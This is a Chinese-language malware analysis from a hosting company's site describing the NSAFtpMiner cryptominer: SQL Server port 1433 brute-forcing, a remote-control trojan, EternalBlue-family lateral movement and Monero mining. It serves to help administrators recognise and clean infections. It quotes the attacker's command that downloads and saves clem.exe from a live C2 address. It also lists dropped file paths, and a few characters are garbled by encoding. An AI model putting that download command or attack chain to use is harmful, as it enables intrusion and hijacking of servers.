搜索

對(duì)話企業(yè)家陶利——做企業(yè)靠 19年前，他是一個(gè)程序員，初出茅廬，經(jīng)驗(yàn)不足，憑借一己之力闖世界;
省市領(lǐng)導(dǎo)蒞臨億恩科技推進(jìn)電 12月22日上午，由河南省商務(wù)廳，鄭州市商務(wù)局有關(guān)領(lǐng)導(dǎo)蒞臨河南省億
怎樣選擇服務(wù)器托管商？如何 互聯(lián)網(wǎng)開展至今，服務(wù)器方面的受到越來越多人的注重，假如要停止服務(wù)器

位置：首頁>技術(shù)參考>服務(wù)器>問題：NSAFtpMiner礦工，win1ogins.exe挖礦病毒，介紹，原理，處理。

問題：NSAFtpMiner礦工，win1ogins.exe挖礦病毒，介紹，原理，處理。

2018年10月29日 15點(diǎn)12分 來源：億恩IDC資訊 有0人參與

云主機(jī) 服務(wù)器租用服務(wù)器托管虛擬主機(jī) 域名注冊(cè) 網(wǎng)站建設(shè)

cpu跑到100%，服務(wù)器非?？?，基本操作不了，所有提供服務(wù)無法正常運(yùn)行。

中毒表現(xiàn)：

1，cpu跑到100%，服務(wù)器非?？ǎ静僮鞑涣?，所有提供服務(wù)無法正常運(yùn)行。

2，進(jìn)程中有win1ogins.exe,中間是數(shù)字1 不是字母l.描述是cpu挖礦。右鍵無法打開文件位置。

3，斷網(wǎng)情況下無法挖礦，CPU占用回下來。

使用360掃描殺毒，可以發(fā)現(xiàn)釋放文件help.dll

原理：黑客通過1433端口爆破入侵SQL Server服務(wù)器，再植入遠(yuǎn)程控制木馬并安裝為系統(tǒng)服務(wù)，然后利用遠(yuǎn)程控制木馬進(jìn)一步加載挖礦木馬進(jìn)行挖礦。

NSAFtpMiner攻擊流程

1433爆破手礦工（NSAFtpMiner）有如下特點(diǎn)：

1.利用密碼字典爆破1433端口登錄；

2.木馬偽裝成系統(tǒng)服務(wù)，COPY自身到c:\windows\svchost.exe，創(chuàng)建服務(wù)“Server Remote”；

3.利用NSA武器庫工具包掃描入侵內(nèi)網(wǎng)開放445/139端口的計(jì)算機(jī)；

4.使用了NSA武器中的多個(gè)工具包Eternalblue(永恒之藍(lán))、Doubleplsar(雙脈沖星)、EternalChampion(永恒冠軍)、Eternalromance（永恒浪漫）、Esteemaudit（RDP漏洞攻擊）；

5.遠(yuǎn)程控制木馬創(chuàng)建“FTP系統(tǒng)核心服務(wù)”，提供FTP服務(wù)，供內(nèi)網(wǎng)其他被入侵的電腦進(jìn)行病毒庫更新；

6.下載挖礦程序在局域網(wǎng)組網(wǎng)挖取門羅幣。

黑客針對(duì)1433端口爆破成功后在受害機(jī)器執(zhí)行命令：

“C:\Windows\System32\WScript.exe” “C:\ProgramData\vget.vbs” hxxp://221.229.204.120:7423/clem.exe C:/ProgramData/clem.exe
將遠(yuǎn)程控制木馬植入。

clem.exe運(yùn)行后拷貝自身到C:\windows\svchost.exe，并創(chuàng)建服務(wù)“Server Remote”。

連接C2地址221.229.204.120：

遠(yuǎn)程控制木馬clem.exe接收指令下載NSA攻擊模塊主程序ru.exe，ru.exe運(yùn)行后在C:\Program Files\Windowsd 釋放72個(gè)子文件。

黑客攻擊時(shí)先關(guān)閉防火墻，然后啟動(dòng)Fileftp.exe掃描內(nèi)網(wǎng)機(jī)器的445/139端口，如果端口處于打開狀態(tài)則利用多個(gè)NSA武器工具（Eternalblue等）對(duì)目標(biāo)機(jī)器進(jìn)行攻擊。若攻擊成功，則根據(jù)不同系統(tǒng)版本在受害機(jī)器上執(zhí)行payload(x86/x64.dll),x86/x64.dll執(zhí)行后釋放出runsum.exe并安裝執(zhí)行，runsum.exe功能同最初的遠(yuǎn)程控制模塊clem.exe相同，接收指令下載挖礦模塊和NSA攻擊模塊進(jìn)行挖礦攻擊和繼續(xù)感染。

使用kill.bat、Pkill.dll對(duì)攻擊進(jìn)程進(jìn)行清除。

遠(yuǎn)程控制木馬clem.exe下載挖礦模塊xxs.exe，xxs.exe運(yùn)行后釋放help.dll到C:\Windows\Fonts\sysIntl。

help.dll釋放礦機(jī)程序win1ogins.exe到以下目錄：

C:\Windows\Help\

C:\Windows\PLA\system\

C:\Windows\Fonts\system(x64)\

C:\Windows\Fonts\system(x86)\

C:\Windwos\dell\

win1ogins.exe采用開源挖礦程序xmrig編譯啟動(dòng)礦機(jī)程序挖礦門羅幣

河南億恩科技股份有限公司(1tcdy.com)始創(chuàng)于2000年，專注服務(wù)器托管租用，是國(guó)家工信部認(rèn)定的綜合電信服務(wù)運(yùn)營(yíng)商。億恩為近五十萬的用戶提供服務(wù)器托管、服務(wù)器租用、機(jī)柜租用、云服務(wù)器、網(wǎng)站建設(shè)、網(wǎng)站托管等網(wǎng)絡(luò)基礎(chǔ)服務(wù)，另有網(wǎng)總管、名片俠網(wǎng)絡(luò)推廣服務(wù)，使得客戶不斷的獲得更大的收益。
服務(wù)器/云主機(jī) 24小時(shí)售后服務(wù)電話：0371-60135900
虛擬主機(jī)/智能建站 24小時(shí)售后服務(wù)電話：0371-55621053
網(wǎng)絡(luò)版權(quán)侵權(quán)舉報(bào)電話：0371-60135995
服務(wù)熱線：0371-60135900